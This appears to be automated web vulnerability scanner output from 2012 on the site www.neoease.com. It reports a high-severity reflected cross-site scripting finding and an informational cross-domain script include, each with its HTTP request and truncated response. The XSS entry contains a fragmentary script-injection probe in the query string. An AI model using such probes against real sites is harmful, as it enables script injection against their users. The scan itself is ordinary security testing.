1. Cross-site scripting (reflected)
2. Cross-domain script include
Severity: | High |
Confidence: | Certain |
Host: | http://www.neoease.com |
Path: | / |
GET /?288dc</script><script Host: www.neoease.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Mon, 02 Jan 2012 20:12:48 GMT Server: Apache X-Pingback: http://www.neoease.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 33859 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <meta charset="UTF-8" /> <title>NeoEase</title> ...[SNIP]... <a class=\"translate\" href=\"http://translate ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.neoease.com |
Path: | / |
GET / HTTP/1.1 Host: www.neoease.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Mon, 02 Jan 2012 20:12:37 GMT Server: Apache X-Pingback: http://www.neoease.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 33542 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <meta charset="UTF-8" /> <title>NeoEase</title> ...[SNIP]... </script> <script type="text/javascript" src="http://pagead2 ...[SNIP]... |